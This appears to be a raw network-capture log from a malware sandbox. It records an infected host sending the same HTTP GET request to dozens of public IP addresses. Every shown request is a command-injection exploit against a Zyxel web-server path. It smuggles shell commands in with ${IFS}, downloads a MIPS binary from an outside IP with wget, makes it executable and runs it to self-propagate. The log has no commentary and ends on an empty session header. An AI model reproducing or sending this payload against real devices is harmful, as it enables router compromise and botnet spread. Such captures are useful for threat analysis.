                                          Jan 14, 2024 15:45:56.676891088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          368192.168.2.2346304126.132.15.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.676985025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          369192.168.2.2337188161.227.136.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:56.677006006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          370192.168.2.2348050178.117.104.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:57.680984020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          371192.168.2.2350006144.148.21.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:57.681044102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          372192.168.2.234611284.149.201.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:57.681072950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          373192.168.2.235490252.114.216.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:57.681102037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          374192.168.2.2340992102.49.154.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:57.681140900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          375192.168.2.234651268.91.141.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:58.684685946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          376192.168.2.234175254.249.118.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:58.684714079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          377192.168.2.2339896207.251.159.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:58.684743881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          378192.168.2.2345668122.144.181.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:58.684814930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          379192.168.2.2354182180.242.166.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:58.684865952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          380192.168.2.2352884146.32.116.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.687918901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          381192.168.2.2342076178.172.143.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.687941074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          382192.168.2.2336140125.245.13.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.687966108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          383192.168.2.2336982108.178.252.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688009024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          384192.168.2.2335322155.61.173.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688015938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          385192.168.2.233278447.80.62.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688061953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          386192.168.2.233610477.150.186.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688093901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          387192.168.2.23380389.156.189.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688093901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          388192.168.2.2350306129.43.33.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688147068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          389192.168.2.2333196122.84.102.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688155890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          390192.168.2.234367052.189.233.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688184977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          391192.168.2.235984023.66.35.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688205004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          392192.168.2.2358500112.255.217.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688218117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          393192.168.2.235333658.61.199.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688260078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          394192.168.2.2348284223.29.1.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688260078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          395192.168.2.235893038.168.98.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688318968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          396192.168.2.2333516131.249.86.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688318014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          397192.168.2.2349760158.123.192.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688355923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          398192.168.2.2352240117.221.26.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688355923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          399192.168.2.23405104.114.173.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688559055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          400192.168.2.235316232.247.94.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688572884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          401192.168.2.23521508.124.193.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688596010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          402192.168.2.2341672202.12.176.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688611984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          403192.168.2.235736824.63.193.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688611984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          404192.168.2.2334414138.81.123.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688623905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          405192.168.2.2341214149.57.188.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688641071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          406192.168.2.234035234.79.176.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688651085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          407192.168.2.235196483.244.163.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688745975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          408192.168.2.2339736216.76.178.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688746929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          409192.168.2.235505686.58.224.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688852072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          410192.168.2.235022854.239.152.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688852072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          411192.168.2.234450835.109.50.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688870907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          412192.168.2.2338438181.54.206.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688889980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          413192.168.2.2340824111.5.96.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688911915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          414192.168.2.2353014198.129.27.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.688934088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          415192.168.2.234132874.99.246.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.689033985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          416192.168.2.235553641.53.143.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.689068079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          417192.168.2.2354330106.63.59.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.689081907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          418192.168.2.234249640.41.144.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.689205885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          419192.168.2.2347922208.90.89.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:45:59.689207077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          420192.168.2.2341822198.52.239.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695714951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          421192.168.2.234364892.200.20.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695770025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          422192.168.2.2344922217.8.153.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695771933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          423192.168.2.235014436.61.238.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695779085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          424192.168.2.2340786148.137.71.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695801020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          425192.168.2.2349034176.72.139.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695833921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          426192.168.2.2337350221.101.175.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695853949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          427192.168.2.234708684.208.18.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695862055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          428192.168.2.234507835.72.38.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695882082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          429192.168.2.234092497.196.118.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.695924044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          430192.168.2.2357496157.238.245.141443
                                          TimestampBytes transferredDirectionData
